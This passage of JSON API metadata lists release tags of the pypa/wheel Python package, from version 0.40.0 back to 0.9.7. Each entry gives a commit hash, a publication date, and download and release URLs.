1f7a3a2d4824009ca4855b3300d61e6d405dc4","kind":"commit","published_at":"2023-03-14T14:38:44.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.40.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0/manifests"},{"name":"0.38.4","sha":"814c2efe8e40051039c5a6de6945e04ecdd162ee","kind":"commit","published_at":"2022-11-09T20:33:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4/manifests"},{"name":"0.38.3","sha":"daeb157c8207b1459fc7baa5f234c165a7a5faf4","kind":"commit","published_at":"2022-11-08T17:46:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3/manifests"},{"name":"0.38.2","sha":"44193907eb308930de05deed863fb4d157c5c866","kind":"commit","published_at":"2022-11-05T12:52:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2/manifests"},{"name":"0.38.1","sha":"6f1608dc1a88f00d2390b9044bd655753f39234c","kind":"commit","published_at":"2022-11-04T09:09:25.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1/manifests"},{"name":"0.38.0","sha":"fcb94cd51f7dfd40d88dff37415750d9e3638d3b","kind":"commit","published_at":"2022-10-20T21:19:31.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0/manifests"},{"name":"0.37.1","sha":"c716c87ffa528ac9a31de3ed3217058848dc2cd2","kind":"commit","published_at":"2021-12-22T12:19:07.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1/manifests"},{"name":"0.37.0","sha":"b8c4aa055cea0132776e7e53edce3538710d5b68","kind":"commit","published_at":"2021-08-09T20:44:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0/manifests"},{"name":"0.36.2","sha":"4fb47f98550f3f43fc0b8c73f518592124ae21bd","kind":"commit","published_at":"2020-12-13T18:07:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2/manifests"},{"name":"0.36.1","sha":"64550e15fdbc96d5690dc872257edc859c218068","kind":"commit","published_at":"2020-12-04T14:00:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1/manifests"},{"name":"0.36.0","sha":"39b6397ba944d82f1fe37d043382f97b78a919d6","kind":"commit","published_at":"2020-12-01T08:52:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0/manifests"},{"name":"0.35.1","sha":"bbc60829bea2eb25ccd236b9c6c16c9ee4f0d2ef","kind":"commit","published_at":"2020-08-14T19:22:54.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1/manifests"},{"name":"0.35.0","sha":"4253bbb865823101d1a1757d12239fc74f49c4e7","kind":"commit","published_at":"2020-08-13T21:08:53.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0/manifests"},{"name":"0.34.2","sha":"0036f80513457a95a309c81d8a63f113b52dbafa","kind":"commit","published_at":"2020-01-30T22:20:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2/manifests"},{"name":"0.34.1","sha":"43078c409ebe9b7d5d70c2476fcb82055e8f0b97","kind":"tag","published_at":"2020-01-27T20:20:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1/manifests"},{"name":"0.34.0","sha":"8b2312799f46359ac78f3b011dc758c45518e9e1","kind":"commit","published_at":"2020-01-27T08:21:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0/manifests"},{"name":"0.33.6","sha":"b227ddd5beaba49294017d061d501f6d433393b0","kind":"commit","published_at":"2019-08-18T09:55:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6/manifests"},{"name":"0.33.5","sha":"9ee9726620f80232ca49991dbeef83963d94482a","kind":"commit","published_at":"2019-08-17T16:13:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5/manifests"},{"name":"0.33.4","sha":"882cd05d9bf4c4fc72568d806e227b5cf14df1d7","kind":"commit","published_at":"2019-05-11T21:41:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4/manifests"},{"name":"0.33.3","sha":"7b782219d5322ee66cef293c5c5b49fbd4133a0d","kind":"commit","published_at":"2019-05-10T11:06:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3/manifests"},{"name":"0.33.2","sha":"9534258081b4abf3af817dab976bc95ecc4bfa30","kind":"commit","published_at":"2019-05-09T08:18:30.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2/manifests"},{"name":"0.33.1","sha":"c15924d80ed2235f277569d99bb9d80f59c9b19d","kind":"commit","published_at":"2019-02-19T14:03:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1/manifests"},{"name":"0.33.0","sha":"bb54233a2dc855951fa40a48d5730c67f9d570c8","kind":"commit","published_at":"2019-02-12T06:58:33.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0/manifests"},{"name":"0.32.3","sha":"11584b78a56b4eedba4eedc55c9dac8aa2dd7070","kind":"commit","published_at":"2018-11-19T00:16:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3/manifests"},{"name":"0.32.2","sha":"3d3708c659f7b9988f958539e7748a1a01ee6e77","kind":"commit","published_at":"2018-10-20T20:03:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2/manifests"},{"name":"0.32.1","sha":"e284ddf676adffa22f6d6a7b02be7328acfe23c4","kind":"commit","published_at":"2018-10-04T06:42:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1/manifests"},{"name":"0.32.0","sha":"46e55b9bc7ac63d4c3a4dee706515968d58848ac","kind":"commit","published_at":"2018-09-29T15:36:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0/manifests"},{"name":"0.31.1","sha":"3dc261abc98a5e43bc7fcf5783d080aaf8f9f0cf","kind":"commit","published_at":"2018-05-13T17:22:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1/manifests"},{"name":"0.31.0","sha":"13d6ff3e8ef509b469d6bb6dd9cd8870ac3f2a16","kind":"commit","published_at":"2018-04-01T20:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0/manifests"},{"name":"0.30.0","sha":"3c9cc212a76b334307985cebfa7ebf269a419223","kind":"commit","published_at":"2017-09-10T21:53:40.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.30.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0/manifests"},{"name":"0.29.0","sha":"bc574d6ed73dabee02e4e00764172d6284a37cb4","kind":"commit","published_at":"2016-02-06T17:18:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.29.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0/manifests"},{"name":"0.28.0","sha":"36997ae4545f3c876771a53f11ae4aa9127cabfe","kind":"commit","published_at":"2016-02-05T21:35:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.28.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0/manifests"},{"name":"0.27.0","sha":"379fe05f71fc6144d5f58e582b6580339479e238","kind":"commit","published_at":"2016-02-05T16:38:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.27.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0/manifests"},{"name":"0.26.0","sha":"acb3cf8177034c014cfe90a691a850b5322951b5","kind":"commit","published_at":"2015-09-18T18:04:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.26.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0/manifests"},{"name":"0.25.0","sha":"4b9fd6bf095c1b4427ed65ac19e4d5666a719f33","kind":"commit","published_at":"2015-09-17T00:34:49.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.25.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0/manifests"},{"name":"0.24.0","sha":"cd0935c4fe92a15ea83057a9357347ae8d6a138e","kind":"commit","published_at":"2014-07-06T16:56:09.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.24.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0/manifests"},{"name":"0.23.0","sha":"75c59f175c8cb2bfcb6660927232b40df1e149c4","kind":"commit","published_at":"2014-04-01T02:01:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.23.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0/manifests"},{"name":"0.22.0","sha":"f1cc0b8a8601040b864e1e784e160744c7e3d965","kind":"commit","published_at":"2013-09-15T20:45:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.22.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0/manifests"},{"name":"0.21.0","sha":"474826f4d64064e852b541f099fa69dcf5dd20fa","kind":"commit","published_at":"2013-07-20T16:19:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.21.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0/manifests"},{"name":"0.16.0","sha":"f65ab72e2c6b04d10a4153807f473c9e9af421d5","kind":"commit","published_at":"2013-04-30T01:46:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.16.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0/manifests"},{"name":"0.15.0","sha":"dffddb1d5af9e736fdd6192ca9256dc767bfab51","kind":"commit","published_at":"2012-11-16T14:06:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.15.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0/manifests"},{"name":"0.13.0","sha":"60fa189589155e43f33587f67eb44bb4fd7d5b58","kind":"commit","published_at":"2012-10-18T00:16:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.13.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0/manifests"},{"name":"0.12.0","sha":"2861596953a6ddfb2c4f052a46a2e2b4c5619245","kind":"commit","published_at":"2012-10-06T12:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.12.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0/manifests"},{"name":"0.11.0","sha":"8dd29d841e15596bc9b5d1c7f7576b2a66113f92","kind":"commit","published_at":"2012-10-06T12:18:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.11.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0/manifests"},{"name":"0.10.3","sha":"7021b0ee2a51e5d9447d06038db58e9e597625f7","kind":"commit","published_at":"2012-10-03T22:55:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3/manifests"},{"name":"0.10.2","sha":"126aaacc9f24fa69b6b74d4e742f645f6bb65cf3","kind":"commit","published_at":"2012-10-03T01:11:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2/manifests"},{"name":"0.10.1","sha":"92e52e6745ec6b1178c2f42585c2f37ab04902a8","kind":"commit","published_at":"2012-10-01T02:52:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1/manifests"},{"name":"0.10.0","sha":"9ee6da6d6cab3fa171f2704df5f934474acc4aae","kind":"commit","published_at":"2012-10-01T02:20:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0/manifests"},{"name":"0.9.7","sha":"a118f5845570ebaf6566b8075dc1dcaf117d7d43","kind":"commit","published_at":"2012-09-20T15:52:36.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/